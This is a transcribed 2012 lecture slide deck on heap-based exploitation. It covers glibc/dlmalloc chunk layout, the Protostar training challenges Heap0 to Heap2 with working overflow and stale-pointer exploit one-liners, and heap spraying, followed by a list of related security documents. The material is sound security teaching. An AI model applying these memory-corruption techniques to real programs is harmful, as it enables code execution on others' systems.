HEAP BASED EXPLOITATION. Scott Hand CSG 2/22/12

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "HEAP BASED EXPLOITATION. Scott Hand CSG 2/22/12"

Transcription

1 HEAP BASED EXPLOITATION Scott Hand CSG 2/22/12

2 WHAT WE WILL COVER Heap Basics Overview of Exercise Environment Protostar Heap0 Heap1 Heap2 Heap3 Heap Spraying Conclusion

3 BASICS Heap Background and Theory

4 WHAT IS THE HEAP? We know about the stack. Programs store local variables there. Heaps are for storing globals as well as variables too large for the stack In Linux:.data Initialized globals.bss Uninitialized globals Heap Dynamically allocated space, grows upwards Stack Local variables, grows down

5 MEMORY ALLOCATION DATA STRUCTURES glibc uses a version of the popular dlmalloc algorithm Memory is allocated in chunks. Each chunk is 8 -byte aligned with a header and data. Each chunk contains: Size information before and after the chunk Easy to combine chunks and allows bidirection traversal from any chunk. Trailer fields are sometimes omitted in recent implementations Chunks are stored in a linked list of bins, sorted by size in continuous increments of 8 for sizes under 512. Over 512 can be any multiple of 8. Upon freeing a chunk, it is combined with freed neighbors to lower fragmentation The final top chunk is empty and its size records the remaining about of free space

6 BINNING Size: 16 Size: 24 Size: 32 Size: 512 Size: 576 Size: 2 31 Chunk 1 Chunk 3 Chunk 4 Chunk 2 Chunk 5

7 SOME CONSEQUENCES Locality Preservation Chunks allocated at the same time tend to be referenced similarly and have coexistent lifetimes Important for good performance, reduces cache misses A tweaked version of nearest-fit is used that results in consecutive blocks when there is space This is good for us Easy to create overflows, as memory allocated after vulnerable variables is often given to other variables nearby that may be for things such as function pointers or file paths

8 MALLOC EXAMPLE We want to see what the heap looks like as more memory is allocated We will allocate three strings: a, b, c. Each is 32 bytes. Code: char *a, *b, *c; a = malloc(32); b = malloc(32); c = malloc(32); This will serve as an introduction to the heap3 problem

9 FIRST ALLOCATION Chunk 1 0x0804c000 8 Byte Size 0x29 0x0804c Byte Data Remaining Space: 0xFD9 a

10 SECOND ALLOCATION Chunk 1 Chunk 2 0x0804c000 8 Byte Size 0x29 0x0804c Byte Data 0x0804c028 8 Byte Size 0x29 0x0804c Byte Data Remaining Space: 0xFB1 a b

11 THIRD ALLOCATION Chunk 1 Chunk 2 Chunk 3 0x0804c000 8 Byte Size 0x29 0x0804c Byte Data 0x0804c028 8 Byte Size 0x29 0x0804c Byte Data 0x0804c050 8 Byte Size 0x29 0x0804c Byte Data Remaining Space: 0xF89 a b c

12 FREE EXAMPLE Now, the interesting (and exploitable) part involves the free() implementation in dlmalloc Let s examine the contents of memory after successive free() commands are executed. Code: free(c); free(b); free(a);

13 BEFORE FIRST FREE Chunk 1 Chunk 2 Chunk 3 0x0804c000 8 Byte Size 0x29 0x0804c008 AAAA\0 0x0804c028 8 Byte Size 0x29 0x0804c030 BBBB\0 0x0804c050 8 Byte Size 0x29 0x0804c058 CCCC\0 Remaining Space: 0xF89 a b c

14 AFTER FIRST FREE Chunk 1 Chunk 2 Chunk 3 0x0804c000 8 Byte Size 0x29 0x0804c008 AAAA\0 0x0804c028 8 Byte Size 0x29 0x0804c030 BBBB\0 0x0804c050 8 Byte Size 0x29 0x0804c058 \0 * 32 Remaining Space: 0xF89 a b

15 AFTER SECOND FREE Chunk 1 Chunk 2 Chunk 3 0x0804c000 8 Byte Size 0x29 0x0804c008 AAAA\0 0x0804c028 8 Byte Size 0x29 0x0804c030 0x0804c050 0x0804c050 8 Byte Size 0x29 0x0804c058 \0 * 32 Remaining Space: 0xF89 a

16 AFTER THIRD FREE Chunk 1 Chunk 2 Chunk 3 0x0804c000 8 Byte Size 0x29 0x0804c008 0x0804c028 0x0804c028 8 Byte Size 0x29 0x0804c030 0x0804c050 0x0804c050 8 Byte Size 0x29 0x0804c058 \0 * 32 Remaining Space: 0xF89

17 LOOKING AT MALLOC.C Here s the chunk structure with important parts bolded: struct malloc_chunk { INTERNAL_SIZE_T INTERNAL_SIZE_T prev_size; size; struct malloc_chunk* fd; struct malloc_chunk* bk; /* Only for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; struct malloc_chunk* bk_nextsize; };

18 SOME OBSERVATIONS Looks like, for whatever reason, this machine uses singly linked lists rather than doubly linked lists We only have the size and fd values to modify

19 EXPLOIT-EXERCISES.COM 3 Virtual Machines with Challenges Nebula Basic exploitation for people with no experience Protostar Lots of real-world exploits without some of the modern exploit mitigation systems Fusion Advanced scenarios and modern protection systems. Good for those who want to learn how to bypass those systems. We will use Protostar. It has 4 heap-based exploitation challenges

20 HEAP CHALLENGES Heap0 Basic heap overflow Heap1 More complicated overflow Heap2 Stale pointers Heap3 Heap metadata manipulation

21 HEAP0 Basic Overflow

22 HEAP0 - OVERVIEW Goal We want to change the function pointer that points to nowinner() to point to winner() instead Description from author: This level introduces heap overflows and how they can influence code flow.

23 HEAP0 - CODE Relevant Code: struct data *d; struct fp *f; d = malloc(sizeof(struct data)); f = malloc(sizeof(struct fp)); f->fp = nowinner; printf("data is at %p, fp is at %p\n", d, f); strcpy(d->name, argv[1]); f->fp();

24 HEAP0 VALID INPUT BEFORE STRCPY d 0 x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x f a 9 f 0 x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x nowinner()

25 HEAP0 VALID INPUT AFTER STRCPY d AAAA 0 x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x f a 9 f 0 x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x nowinner()

26 HEAP0 EXPLOIT CREATION If we overflow the character buffer in d, we can overwrite the function pointer f The distance from f to d is 0x804a050-0x804a008 = 72 The pointer for winner() is 0x Python Code: print "A"*72 + "\x64\x84\x04\x08"

27 HEAP0 INVALID INPUT AFTER STRCPY d 0 x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x f a 9 f 0 x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x x a : 0 x x x x winner()

28 HEAP1 Tougher Overflow

29 HEAP1 - OVERVIEW Goal Execute the winner() function again. But it s not so obvious how this will happen. There are two allocations and two strcpy commands There are no function pointers. What should we overwrite? Description from Author: This level takes a look at code flow hijacking in data overwrite cases.

30 HEAP1 CODE Relevant Code struct internet *i1, *i2, *i3; i1 = malloc(sizeof(struct internet)); i1->priority = 1; i1->name = malloc(8); i2 = malloc(sizeof(struct internet)); i2->priority = 2; i2->name = malloc(8); strcpy(i1->name, argv[1]); strcpy(i2->name, argv[2]);

31 HEAP1 EXPLOIT IDEAS This instruction is the important one: strcpy(i2->name, argv[2]); We are moving an argument into a pointer stored at i2 ->name Can we change the destination of our argument?

32 HEAP1 VALID INPUT BEFORE STRCPY i1 i1->name 0 x a : 0 x x x x a x a : 0 x x x x x a : 0 x x x x a x a : 0 x x x x x a : 0 x x f c 1 0 x x i2 i2->name

33 HEAP1 VALID INPUT AFTER STRCPY i1 i1->name = AAAA 0 x a : 0 x x x x a x a : 0 x x x x x a : 0 x x x x a x a : 0 x x x x x a : 0 x x f c 1 0 x x i2 i2->name = BBBB

34 HEAP1 EXPLOIT CREATION Let s overflow i1->name to overwrite i2->name s pointer Where to point? Return address! 20 characters of padding A characters Return address is stored at 0xbffff79c Address of winner() is 0x Python Code for overflow (i1): print "A"*20 + "\x9c\xf7\xff\xbf" Shell Code for replacement (i2): printf "\x94\x84\x04\x08" Final exploit: `python -c 'print "A"*20 + "\x9c\xf7\xff\xbf"'` `printf "\x94\x84\x04\x08"`

35 HEAP2 Stale Pointers

36 HEAP2 - OVERVIEW Goal According to the problem description, this level is completed when you see the "you have logged in already!" message Description from Author: This level examines what can happen when heap pointers are stale.

37 HEAP2 PROGRAM DESCRIPTION For each input loop, the following commands are parsed: auth Description: Allocates memory for auth pointer, clears it, then copies the user input into it Code: auth = malloc(sizeof(auth)); memset(auth, 0, sizeof(auth)); if(strlen(line + 5) < 31) { } service strcpy(auth->name, line + 5); Description: Changes the service pointer to a duplicate of the provided input Code: service = strdup(line + 7);

38 HEAP2 PROGRAM DESCRIPTION For each input loop, the following commands are parsed : reset Description: Frees the auth pointer Code: login free(auth); Description: Simulates a login. If the auth->auth field is nonzero, then the user is logged in. Otherwise, we get a dummy password prompt. Code: if(auth->auth) { } else { } printf("you have logged in already!\n"); printf("please enter your password\n");

39 HEAP2 VULNERABILITY This program calls malloc() for auth using sizeof(auth) sizeof(auth) returns 4 because it s returning the size of the pointer, not the size of the struct However, calls to auth->auth still access memory well beyond its allocated 4 bytes

40 HEAP2 EXPLOIT Let s call auth CSG to set up our auth pointer Then call service with a bunch of non-zero garbage Then, auth->auth will overflow auth s buffer into service s buffer and read a non-zero integer. Python Exploit: print "auth CSG\nservice " + "A"*16 + "\nlogin"

41 HEAP2 EXPLOIT VISUALIZED What the programmer thinks happened: 0x804c000 0x804c008 0x804c028 auth size auth->name auth->auth 0x804c030 service size 0x804c038 service data What actually happened: 0x804c000 0x804c008 0x804c018 0x804c020 0x804c028 auth size auth->name auth->auth service size service data auth->auth is non-zero

42 HEAP3 Metadata Corruption

43 HEAP3 OVERVIEW Try this one on your own We ll go over the solution next week

44 HEAP SPRAYING More Heap Abuse

45 HEAP SPRAYING The memory allocation algorithm s tendency towards contiguous chunk placement can be used for evil yet again In browser, PDF, Flash, etc. exploitation in which the user can control memory allocations (usually via scripting languages like JavaScript), payload placement is usually done on the heap How do we reliably find our payload in the potentially fragmented heap? Fill up an entire chunk with NOP sled + payload and spray it repeatedly into the heap Once the allocator fills in the gaps for the heap fragmentation, we get a nice big contiguous landing area

46 CONCLUSION

47 CONCLUSION Links: https://www.corelan.be/index.php/2011/12/31/exploit-writingtutorial-part-11-heap-spraying-demystified/ Any questions?

Unix Security Technologies. Pete Markowsky

Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu> Unix Security Technologies Pete Markowsky What is this about? The goal of this CPU/SWS are: Introduce you to classic vulnerabilities Get you to understand security advisories Make

More information

Lecture 10: Dynamic Memory Allocation 1: Into the jaws of malloc()

Lecture 10: Dynamic Memory Allocation 1: Into the jaws of malloc() CS61: Systems Programming and Machine Organization Harvard University, Fall 2009 Lecture 10: Dynamic Memory Allocation 1: Into the jaws of malloc() Prof. Matt Welsh October 6, 2009 Topics for today Dynamic

More information

Format string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc WwW.Abysssec.Com

Format string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc WwW.Abysssec.Com Format string exploitation on windows Using Immunity Debugger / Python By Abysssec Inc WwW.Abysssec.Com For real beneficiary this post you should have few assembly knowledge and you should know about classic

More information

Off-by-One exploitation tutorial

Off-by-One exploitation tutorial Off-by-One exploitation tutorial By Saif El-Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend

More information

Bypassing Memory Protections: The Future of Exploitation

Bypassing Memory Protections: The Future of Exploitation Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Research into reliable exploitation techniques: Heap Feng Shui in JavaScript

More information

Software security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security

Software security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security Software security Buffer overflow attacks SQL injections Lecture 11 EIT060 Computer Security Buffer overflow attacks Buffer overrun is another common term Definition A condition at an interface under which

More information

MWR InfoSecurity Advisory. Interwoven Worksite ActiveX Control Remote Code Execution. 10 th March 2008. Contents

MWR InfoSecurity Advisory. Interwoven Worksite ActiveX Control Remote Code Execution. 10 th March 2008. Contents Contents MWR InfoSecurity Advisory Interwoven Worksite ActiveX Control Remote Code Execution 10 th March 2008 2008-03-10 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...5 1.1 Introduction...5

More information

Application Note. Introduction AN2471/D 3/2003. PC Master Software Communication Protocol Specification

Application Note. Introduction AN2471/D 3/2003. PC Master Software Communication Protocol Specification Application Note 3/2003 PC Master Software Communication Protocol Specification By Pavel Kania and Michal Hanak S 3 L Applications Engineerings MCSL Roznov pod Radhostem Introduction The purpose of this

More information

Advanced IBM AIX Heap Exploitation. Tim Shelton V.P. Research & Development HAWK Network Defense, Inc. tshelton@hawkdefense.com

Advanced IBM AIX Heap Exploitation. Tim Shelton V.P. Research & Development HAWK Network Defense, Inc. tshelton@hawkdefense.com Advanced IBM AIX Heap Exploitation Tim Shelton V.P. Research & Development HAWK Network Defense, Inc. tshelton@hawkdefense.com Introduction Our society has become dependent on computers and network systems.

More information

REMOVING THE MYSTERY OF SECURITY ENGINES AND THEIR EFFECT ON YOUR NETWORK

REMOVING THE MYSTERY OF SECURITY ENGINES AND THEIR EFFECT ON YOUR NETWORK REMOVING THE MYSTERY OF SECURITY ENGINES AND THEIR EFFECT ON YOUR NETWORK Philip Trainor Senior Manager Applications and Security Ixia Communications Session ID: SPO-T02 Session Classification: Intermediate

More information

Exploiting nginx chunked overflow bug, the undisclosed attack vector

Exploiting nginx chunked overflow bug, the undisclosed attack vector Exploiting nginx chunked overflow bug, the undisclosed attack vector Long Le longld@vnsecurity.net About VNSECURITY.NET CLGT CTF team 2 VNSECURITY.NET In this talk Nginx brief introduction Nginx chunked

More information

Molecular Dynamics Simulations with Applications in Soft Matter Handout 7 Memory Diagram of a Struct

Molecular Dynamics Simulations with Applications in Soft Matter Handout 7 Memory Diagram of a Struct Dr. Martin O. Steinhauser University of Basel Graduate Lecture Spring Semester 2014 Molecular Dynamics Simulations with Applications in Soft Matter Handout 7 Memory Diagram of a Struct Friday, 7 th March

More information

Jonathan Worthington Scarborough Linux User Group

Jonathan Worthington Scarborough Linux User Group Jonathan Worthington Scarborough Linux User Group Introduction What does a Virtual Machine do? Hides away the details of the hardware platform and operating system. Defines a common set of instructions.

More information

System Software Prof. Dr. H. Mössenböck

System Software Prof. Dr. H. Mössenböck System Software Prof. Dr. H. Mössenböck 1. Memory Management 2. Garbage Collection 3. Linkers and Loaders 4. Debuggers 5. Text Editors Marks obtained by end-term exam http://ssw.jku.at/misc/ssw/ 1. Memory

More information

Betriebssysteme KU Security

Betriebssysteme KU Security Betriebssysteme KU Security IAIK Graz University of Technology 1 1. Drivers 2. Security - The simple stuff 3. Code injection attacks 4. Side-channel attacks 2 1. Drivers 2. Security - The simple stuff

More information

Cataloguing and Avoiding the Buffer Overflow Attacks in Network Operating Systems

Cataloguing and Avoiding the Buffer Overflow Attacks in Network Operating Systems Abstract: Cataloguing and Avoiding the Buffer Overflow Attacks in Network Operating Systems *P.VADIVELMURUGAN #K.ALAGARSAMY *Research Scholar, Department of Computer Center, Madurai Kamaraj University,

More information

Sandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers

Sandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers Sandy The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis About Me! I work as a Researcher for a Global Threat Research firm.! Spoke at the few security

More information

SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING. Presented by: Dave Kennedy Eric Smith

SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING. Presented by: Dave Kennedy Eric Smith SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING Presented by: Dave Kennedy Eric Smith AGENDA Penetration Testing by the masses Review of current state by most service providers Deficiencies in

More information

Source Code Security Analysis Tool Functional Specification Version 1.0

Source Code Security Analysis Tool Functional Specification Version 1.0 Special Publication 500-268 Source Code Security Analysis Tool Functional Specification Version 1.0 Paul E. Black Michael Kass Michael Koo Software Diagnostics and Conformance Testing Division Information

More information

An Introduction To Simple Scheduling (Primarily targeted at Arduino Platform)

An Introduction To Simple Scheduling (Primarily targeted at Arduino Platform) An Introduction To Simple Scheduling (Primarily targeted at Arduino Platform) I'm late I'm late For a very important date. No time to say "Hello, Goodbye". I'm late, I'm late, I'm late. (White Rabbit in

More information

What is Web Security? Motivation

What is Web Security? Motivation brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web

More information

Operating Systems CSE 410, Spring 2004. File Management. Stephen Wagner Michigan State University

Operating Systems CSE 410, Spring 2004. File Management. Stephen Wagner Michigan State University Operating Systems CSE 410, Spring 2004 File Management Stephen Wagner Michigan State University File Management File management system has traditionally been considered part of the operating system. Applications

More information

Chapter 13 File and Database Systems

Chapter 13 File and Database Systems Chapter 13 File and Database Systems Outline 13.1 Introduction 13.2 Data Hierarchy 13.3 Files 13.4 File Systems 13.4.1 Directories 13.4. Metadata 13.4. Mounting 13.5 File Organization 13.6 File Allocation

More information

Chapter 13 File and Database Systems

Chapter 13 File and Database Systems Chapter 13 File and Database Systems Outline 13.1 Introduction 13.2 Data Hierarchy 13.3 Files 13.4 File Systems 13.4.1 Directories 13.4. Metadata 13.4. Mounting 13.5 File Organization 13.6 File Allocation

More information

Caml Virtual Machine File & data formats Document version: 1.4 http://cadmium.x9c.fr

Caml Virtual Machine File & data formats Document version: 1.4 http://cadmium.x9c.fr Caml Virtual Machine File & data formats Document version: 1.4 http://cadmium.x9c.fr Copyright c 2007-2010 Xavier Clerc cadmium@x9c.fr Released under the LGPL version 3 February 6, 2010 Abstract: This

More information

Illustration 1: Diagram of program function and data flow

Illustration 1: Diagram of program function and data flow The contract called for creation of a random access database of plumbing shops within the near perimeter of FIU Engineering school. The database features a rating number from 1-10 to offer a guideline

More information

Where s the FEEB? The Effectiveness of Instruction Set Randomization

Where s the FEEB? The Effectiveness of Instruction Set Randomization Where s the FEEB? The Effectiveness of Instruction Set Randomization Ana Nora Sovarel David Evans Nathanael Paul University of Virginia, Department of Computer Science http://www.cs.virginia.edu/feeb Abstract

More information

Persist It Using and Abusing Microsoft s Fix It Patches

Persist It Using and Abusing Microsoft s Fix It Patches Persist It Using and Abusing Microsoft s Fix It Patches Jon Erickson : isight Partners : jerickson@isightpartners.com Abstract: Microsoft has often used Fix it patches, which are a subset of Application

More information

Data Structure Reverse Engineering

Data Structure Reverse Engineering Data Structure Reverse Engineering Digging for Data Structures Polymorphic Software with DSLR Scott Hand October 28 th, 2011 Outline 1 Digging for Data Structures Motivations Introduction Laika Details

More information

The V8 JavaScript Engine

The V8 JavaScript Engine The V8 JavaScript Engine Design, Implementation, Testing and Benchmarking Mads Ager, Software Engineer Agenda Part 1: What is JavaScript? Part 2: V8 internals Part 3: V8 testing and benchmarking What is

More information

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration

More information

Perl In Secure Web Development

Perl In Secure Web Development Perl In Secure Web Development Jonathan Worthington (jonathan@jwcs.net) August 31, 2005 Perl is used extensively today to build server side web applications. Using the vast array of modules on CPAN, one

More information

1 The Java Virtual Machine

1 The Java Virtual Machine 1 The Java Virtual Machine About the Spec Format This document describes the Java virtual machine and the instruction set. In this introduction, each component of the machine is briefly described. This

More information

Understanding the heap by breaking it

Understanding the heap by breaking it Understanding the heap by breaking it A case study of the heap as a persistent data structure through nontraditional exploitation techniques Abstract: Traditional exploitation techniques of overwriting

More information

Software Vulnerabilities

Software Vulnerabilities Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in

More information

Cryptography and Network Security Prof. D. Mukhopadhyay Department of Computer Science and Engineering

Cryptography and Network Security Prof. D. Mukhopadhyay Department of Computer Science and Engineering Cryptography and Network Security Prof. D. Mukhopadhyay Department of Computer Science and Engineering Indian Institute of Technology, Kharagpur Module No. # 01 Lecture No. # 39 System Security Welcome

More information

Last update: February 23, 2004

Last update: February 23, 2004 Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to

More information

Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current

More information

M A S S A C H U S E T T S I N S T I T U T E O F T E C H N O L O G Y DEPARTMENT OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

M A S S A C H U S E T T S I N S T I T U T E O F T E C H N O L O G Y DEPARTMENT OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE M A S S A C H U S E T T S I N S T I T U T E O F T E C H N O L O G Y DEPARTMENT OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE 1. Introduction 6.004 Computation Structures β Documentation This handout is

More information

Oracle Solaris Studio Code Analyzer

Oracle Solaris Studio Code Analyzer Oracle Solaris Studio Code Analyzer The Oracle Solaris Studio Code Analyzer ensures application reliability and security by detecting application vulnerabilities, including memory leaks and memory access

More information

Storage Classes CS 110B - Rule Storage Classes Page 18-1 \handouts\storclas

Storage Classes CS 110B - Rule Storage Classes Page 18-1 \handouts\storclas CS 110B - Rule Storage Classes Page 18-1 Attributes are distinctive features of a variable. Data type, int or double for example, is an attribute. Storage class is another attribute. There are four storage

More information

The Advantages of Block-Based Protocol Analysis for Security Testing

The Advantages of Block-Based Protocol Analysis for Security Testing The Advantages of Block-Based Protocol Analysis for Security Testing Dave Aitel Immunity,Inc. 111 E. 7 th St. Suite 64, NY NY 10009, USA dave@immunitysec.com February, 4 2002 Abstract. This paper describes

More information

Chapter 13. Chapter Outline. Disk Storage, Basic File Structures, and Hashing

Chapter 13. Chapter Outline. Disk Storage, Basic File Structures, and Hashing Chapter 13 Disk Storage, Basic File Structures, and Hashing Copyright 2007 Ramez Elmasri and Shamkant B. Navathe Chapter Outline Disk Storage Devices Files of Records Operations on Files Unordered Files

More information

Coverity White Paper. Reduce Your Costs: Eliminate Critical Security Vulnerabilities with Development Testing

Coverity White Paper. Reduce Your Costs: Eliminate Critical Security Vulnerabilities with Development Testing Reduce Your Costs: Eliminate Critical Security Vulnerabilities with Development Testing The Stakes Are Rising Security breaches in software and mobile devices are making headline news and costing companies

More information

A Test Suite for Basic CWE Effectiveness. Paul E. Black. paul.black@nist.gov. http://samate.nist.gov/

A Test Suite for Basic CWE Effectiveness. Paul E. Black. paul.black@nist.gov. http://samate.nist.gov/ A Test Suite for Basic CWE Effectiveness Paul E. Black paul.black@nist.gov http://samate.nist.gov/ Static Analysis Tool Exposition (SATE V) News l We choose test cases by end of May l Tool output uploaded

More information

Enhancing Server Availability and Security Through Failure-Oblivious Computing

Enhancing Server Availability and Security Through Failure-Oblivious Computing Enhancing Server Availability and Security Through Failure-Oblivious Computing Martin Rinard, Cristian Cadar, Daniel Dumitran, Daniel M. Roy, Tudor Leu, and William S. Beebee, Jr. Computer Science and

More information

An Implementation of a Tool to Detect Vulnerabilities in Coding C and C++

An Implementation of a Tool to Detect Vulnerabilities in Coding C and C++ An Implementation of a Tool to Detect Vulnerabilities in Coding C and C++ GRADUATE PROJECT REPORT Submitted to the Faculty of The School of Engineering & Computing Sciences Texas A&M University-Corpus

More information

Real World Software Assurance Test Suite: STONESOUP

Real World Software Assurance Test Suite: STONESOUP Real World Software Assurance Test Suite: STONESOUP Charles Oliveira/SAMATE Guest Researcher at Software and Systems Division, IT Laboratory NIST Outline - Introduction STONESOUP

More information

From SQL Injection to MIPS Overflows

From SQL Injection to MIPS Overflows From SQL Injection to MIPS Overflows Rooting SOHO Routers Zachary Cutlip Black Hat USA 2012 Acknowledgements Tactical Network Solutions Craig Heffner What I m going to talk about Novel uses of SQL injection

More information

CSC 2405: Computer Systems II

CSC 2405: Computer Systems II CSC 2405: Computer Systems II Spring 2013 (TR 8:30-9:45 in G86) Mirela Damian http://www.csc.villanova.edu/~mdamian/csc2405/ Introductions Mirela Damian Room 167A in the Mendel Science Building mirela.damian@villanova.edu

More information

Chapter 1 Web Application (In)security 1

Chapter 1 Web Application (In)security 1 Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is

More information

Content. Introduction and History. File I/O. The File System. Shell Programming. Standard Unix Files and Configuration. Processes

Content. Introduction and History. File I/O. The File System. Shell Programming. Standard Unix Files and Configuration. Processes Content Introduction and History File I/O The File System Shell Programming Standard Unix Files and Configuration Processes Programs are instruction sets stored on a permanent medium (e.g. harddisc). Processes

More information

Jordan University of Science and Technology

Jordan University of Science and Technology Jordan University of Science and Technology Department of Computer Engineering Cryptography and Networks Security Investigation Done By Omar Ibrahim Mohammad Bataineh 20010171035 Aysar Mohammad Rashed

More information

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management

3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org

More information

Parallel and Distributed Computing Programming Assignment 1

Parallel and Distributed Computing Programming Assignment 1 Parallel and Distributed Computing Programming Assignment 1 Due Monday, February 7 For programming assignment 1, you should write two C programs. One should provide an estimate of the performance of ping-pong

More information

Announcements. Lab 2 now on web site

Announcements. Lab 2 now on web site Lab 2 now on web site Announcements Next week my office hours moved to Monday 4:3pm This week office hours Wednesday 4:3pm as usual Weighting of papers for final discussion [discussion of listen] Bro:

More information

Heartbleed. or: I read the news, too. Martin R. Albrecht. Information Security Group, Royal Holloway, University of London

Heartbleed. or: I read the news, too. Martin R. Albrecht. Information Security Group, Royal Holloway, University of London Heartbleed or: I read the news, too Martin R. Albrecht Information Security Group, Royal Holloway, University of London XKCD #1354 XKCD #1354 XKCD #1354 XKCD #1354 XKCD #1354 XKCD #1354 RFC 6520: Transport

More information

System Calls Related to File Manipulation

System Calls Related to File Manipulation KING FAHD UNIVERSITY OF PETROLEUM AND MINERALS Information and Computer Science Department ICS 431 Operating Systems Lab # 12 System Calls Related to File Manipulation Objective: In this lab we will be

More information

Forensic Analysis of Internet Explorer Activity Files

Forensic Analysis of Internet Explorer Activity Files Forensic Analysis of Internet Explorer Activity Files by Keith J. Jones keith.jones@foundstone.com 3/19/03 Table of Contents 1. Introduction 4 2. The Index.dat File Header 6 3. The HASH Table 10 4. The

More information

Web Application Report

Web Application Report Web Application Report This report includes important security information about your Web Application. Security Report This report was created by IBM Rational AppScan 8.5.0.1 11/14/2012 8:52:13 AM 11/14/2012

More information

Discovering passwords in the memory

Discovering passwords in the memory Discovering passwords in the memory Abhishek Kumar (abhishek.kumar@paladion.net) November 2003 Escalation of privileges is a common method of attack where a low privileged user exploits a vulnerability

More information

SMTP-32 Library. Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows. Version 5.2

SMTP-32 Library. Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows. Version 5.2 SMTP-32 Library Simple Mail Transfer Protocol Dynamic Link Library for Microsoft Windows Version 5.2 Copyright 1994-2003 by Distinct Corporation All rights reserved Table of Contents 1 Overview... 5 1.1

More information

The C Programming Language course syllabus associate level

The C Programming Language course syllabus associate level TECHNOLOGIES The C Programming Language course syllabus associate level Course description The course fully covers the basics of programming in the C programming language and demonstrates fundamental programming

More information

Defense in Depth: Protecting Against Zero-Day Attacks

Defense in Depth: Protecting Against Zero-Day Attacks Defense in Depth: Protecting Against Zero-Day Attacks Chris McNab FIRST 16, Budapest 2004 Agenda Exploits through the ages Discussion of stack and heap overflows Common attack behavior Defense in depth

More information

Top 10 Web Application Security Vulnerabilities - with focus on PHP

Top 10 Web Application Security Vulnerabilities - with focus on PHP Top 10 Web Application Security Vulnerabilities - with focus on PHP Louise Berthilson Alberto Escudero Pascual 1 Resources The Top 10 Project by OWASP www.owasp.org/index.php/owasp_top_ten_project

More information

Web application security: automated scanning versus manual penetration testing.

Web application security: automated scanning versus manual penetration testing. Web application security White paper January 2008 Web application security: automated scanning versus manual penetration testing. Danny Allan, strategic research analyst, IBM Software Group Page 2 Contents

More information

CommonSpot Content Server Version 6.2 Release Notes

CommonSpot Content Server Version 6.2 Release Notes CommonSpot Content Server Version 6.2 Release Notes Copyright 1998-2011 PaperThin, Inc. All rights reserved. About this Document CommonSpot version 6.2 updates the recent 6.1 release with: Enhancements

More information

Network Security Algorithms

Network Security Algorithms Network Security Algorithms Thomas Zink University of Konstanz thomas.zink@uni-konstanz.de Abstract. Viruses, Worms and Trojan Horses, the malware zoo is growing every day. Hackers and Crackers try to

More information

6. Storage and File Structures

6. Storage and File Structures ECS-165A WQ 11 110 6. Storage and File Structures Goals Understand the basic concepts underlying different storage media, buffer management, files structures, and organization of records in files. Contents

More information

Attacking the TCP Reassembly Plane of Network Forensics Tools

Attacking the TCP Reassembly Plane of Network Forensics Tools Attacking the TCP Reassembly Plane of Network Forensics Tools Gérard 12 Thomas Engel 1 1 University of Luxembourg - SECAN LAB 2 SES ASTRA Outline Introduction Definitions and terminology A PCAP file contains

More information

Leak Check Version 2.1 for Linux TM

Leak Check Version 2.1 for Linux TM Leak Check Version 2.1 for Linux TM User s Guide Including Leak Analyzer For x86 Servers Document Number DLC20-L-021-1 Copyright 2003-2009 Dynamic Memory Solutions LLC www.dynamic-memory.com Notices Information

